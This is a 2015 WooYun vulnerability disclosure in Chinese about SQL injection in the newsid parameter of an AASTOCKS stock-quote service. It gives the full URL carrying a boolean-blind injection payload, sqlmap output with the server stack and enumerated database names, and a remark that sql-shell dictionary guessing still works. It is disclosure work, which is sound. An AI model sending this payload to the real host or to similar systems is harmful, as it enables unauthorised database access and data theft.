当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124687

漏洞标题:hk阿思达克某站点存在sql注入

相关厂商:阿思达克

漏洞作者: CF_tan

提交时间:2015-07-09 22:58

修复时间:2015-08-23 23:00

公开时间:2015-08-23 23:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

参数无过滤导致sql注入

详细说明:

http://services3.aastocks.com/xyzq/market_stockquote_server.aspx?symbol=03968&stockid=hk&source=AA&newsid=NOW.676866' AND 9173=9173 AND 'chri'='chri
参数newsid存在sql注入 poc

sqlmap identified the following injection points with a total of 82 HTTP(s) requests:
---
Parameter: newsid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symbol=03968&stockid=hk&source=AA&newsid=NOW.676866' AND 9173=9173 AND 'chri'='chri
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [24]:
[*] [\x06 dbox_UP]
[*] [\x08ePoqq@BOCA]
[*] [CAiEDa\x10B]
[*] [FinP\x1f\x03\x04l]
[*] [Q=\x10 rA\x11\x04@e\\chn]
[*] [Q\x02pa\x10t]A]
[*] [Rbdbox_`qInd\x10ea]
[*] [Redbox_CM ALtqa\x1d]
[*] [Redbqt]HPqPqA]
[*] [RSda@A\x08SA]
[*] asdb
[*] Chi_News
[*] Chn_NenMoael
[*] Chn_News
[*] FestqielEion
[*] ICPew
[*] master
[*] model
[*] OthheT
[*] Q
[*] Qews
[*] Quote_CD_L1
[*] Redbox_BD
[*] RedBoxA2M


漏洞证明:

current-user.png


当前用户是webconnect

all-user.png


数据库中有两个用户

not.png


不是dba
直接在后面sqlmap.py -u XXX -D Chi_News --tables不能获取表内容,但是用sql-shell,还是可以字典碰撞的

sys.png


data.png

修复方案:

参数过滤

版权声明:转载请注明来源 CF_tan@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论